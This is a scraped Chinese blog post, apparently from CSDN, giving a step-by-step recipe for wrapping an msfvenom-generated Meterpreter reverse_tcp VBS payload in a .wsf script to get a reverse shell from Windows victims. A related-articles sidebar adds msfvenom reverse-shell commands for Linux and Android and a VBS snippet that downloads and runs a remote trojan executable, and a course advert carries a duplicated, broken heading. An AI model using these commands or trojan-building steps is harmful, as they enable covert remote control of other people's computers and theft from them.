msf 生成.wsf 木马

已于 2024-01-08 10:36:32 修改
阅读量205 收藏
点赞数
文章标签: 网络 安全 运维 网络安全 msf木马
于 2023-03-15 23:37:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59598029/article/details/129565660
版权

首先了解wsf是啥语言,可参考文章如下:

https://www.cnblogs.com/vitrox/p/5137441.html
https://blog.csdn.net/leyvan/article/details/3746683
http://book.51cto.com/art/201111/300472.htm

wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,

Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。

wsf后门思路

1)学习.wsf脚本格式

2)msf生成vbs

  1. msf生成vbs插入.wsf脚本格式

4)尝试运行查看是否报错

5)反弹shell

开始制作脚本:

1) .wsf脚本格式

img

2) msf生成vbs

msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport=  EXITFUNC=thread -f vbs--platform win > test.vbs

复制

img

3) msf生成vbs插入.wsf脚本中

img

4)尝试运行无查看是否报错:

直接运行无报错

img

使用cscript.exe (WindowsScript Host引擎),运行无报错:

img

5)反弹shell

监听:

img

反弹:

img

知识补充:

img

img

img在这里插入图片描述

网络安全成长路线图

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

d59b5f63c5e626f914.png)

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

教IT的小强
关注
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1581
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
制作自动运行木马的vbs脚本
qt726qt
01-16 756
制作自动运行木马的vbs脚本 2010年05月17日   [b]自动下载并运行的VBS脚本代码 转自二进制小组   Set xPost = CreateObject("Microsoft.XMLHTTP")   xPost.Open "GET","http://www.***/muma.exe [/b][b]",0   xPost.Send()   Set sGet = Cr...
ProcessWire简介
代码教主
06-09 551
介绍 ProcessWire是一个免费的开源内容管理系统(CMS)和内容管理框架(CMF)。 它内置了所需的所有资源,有助于节省时间和建立实时网站所需的精力。 尽管还有很多其他内容管理系统和内容管理框架,但是它们通常都不那么容易定制。 另一方面,对于熟悉PHP的任何人,ProcessWire都是相当可定制的。 与某些其他CMS / CMF相比,ProcessWire所需的资源要少得多,...
使用msfvenom生成木马
Sylon的博客
08-27 3525
msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,...
com.tencent.mobileqq_MSF.21.03.26.17.qlog
03-27
com.tencent.mobileqq_MSF.21.03.26.17.qlog
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1940
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
com.tencent.mobileqq_MSF.21.10.10.12.log
10-10
com.tencent.mobileqq_MSF.21.10.10.12.log
WSF脚本详解:JS和VBS互调用
weixin_30411997的博客
01-17 620
1.概述   Windows Script Host除了提供一个对象模型之外,还提供了一种脚本框架,这就是WSF脚本。通过WSF约定的标记元素,可以将多种脚本语言写的代码块组合起来,完成任务。除此之外,还可以实现一些DOS没有的命令功能,通过CScript xxx.wsf /?来查看帮助文档,帮助文档由WSF声明并由解释器动态生成完整的文档。再联合使用WshEnvironment对象,即可对DO...
【学习知识】木马病毒在windows系统中的几种启动方式 - 病毒防治中心 - 360百科
liuyukuan的专栏
11-04 2022
( Fri, 22 Aug 2008 11:26:42 +0800 )Description:如果你的电脑中一种新型的木马病毒你能怎么办?特别是一些未知类型的木马病毒,使用一般的杀毒软件或防木马软件是很难将其根除的,这时候我们就需要手动来清除这些病毒文件了。<br /><br />其实我们只要能破坏这些病毒的启动条件,就可以达到清除病毒的目的,为此,就本人在这方面的一些经验提供给大家,以供参考。<br /><br />病毒的启动主要分为3类,分别是:一、随windows系统启动,二、映像劫持启动,三、捆绑和
Microsoft Excel.WsF——U盘里面的隐藏病毒怎么删除
Janet_C小屋
01-22 5888
0. 问题U盘里的文件全部变成了快捷方式,但是没有发现其他异常,杀毒软件也没能扫描出来1. 发现症结原因流程——a、U盘格式化(防止太多文件,不知道哪个有问题);b、我的电脑(计算机)——打开——如下图操作——注意把隐藏的几个选项中的勾去掉!!!;c、再打开U盘,就会发现里面有个 Microsoft Excel.WsF,这就是症结所在。解决——这个时候,首先想到的肯定是删除,可以试试,就会发现删除...
js调用 Windows 脚本文件 (.wsf)
weixin_33728708的博客
12-22 504
Windows 脚本文件 (*.wsf) 是含有可扩展标记语言 (XML) 代码的文本文档。它综合了几个可增强脚本灵活性的功能。由于 Windows 脚本文件不是特定于引擎的,因此它们可包含与 Windows 脚本兼容的任何脚本引擎中的脚本。它们充当容器。 使用 .wsf 文件,可以在创建脚本时使用以下功能: .wsf 文件支持 实现 Include 语句...
[转载]初识Windows 脚本文件(*.wsf)
孤身走我路.
11-28 1745
初识Windows 脚本文件(*.wsf) Windows 脚本文件(*.wsf) 是含有可扩展标记语言 (XML) 代码的文本文档,它综合了几个可增强脚本灵活性的功能。由于 Windows 脚本文件不是特定于引擎的,因此它们可包含与 Windows 脚本兼容的任何脚本引擎中的脚本。它们充当容器。 使用 .wsf 文件,可以在创建脚本时使用以下功能: .wsf 文件支持实现 1.  In
使用 Windows 脚本文件 (.wsf)
leyvan的专栏
01-10 6972
使用 Windows 脚本文件 (.wsf)Windows 脚本文件 (*.wsf) 是含有可扩展标记语言 (XML) 代码的文本文档。它综合了几个可增强脚本灵活性的功能。由于 Windows 脚本文件不是特定于引擎的,因此它们可包含与 Windows 脚本兼容的任何脚本引擎中的脚本。它们充当容器。使用 .wsf 文件,可以在创建脚本时使用以下功能:
Msfvenonm生成后门木马
谢公子的博客
11-08 9863
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Msfvenom –p (- -payload-opti...
msf生成捆绑安卓木马
最新发布
05-27
在Metasploit中,可以使用以下步骤生成捆绑安卓木马: 1. 打开Metasploit控制台并输入以下命令启动msfvenom: ``` msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值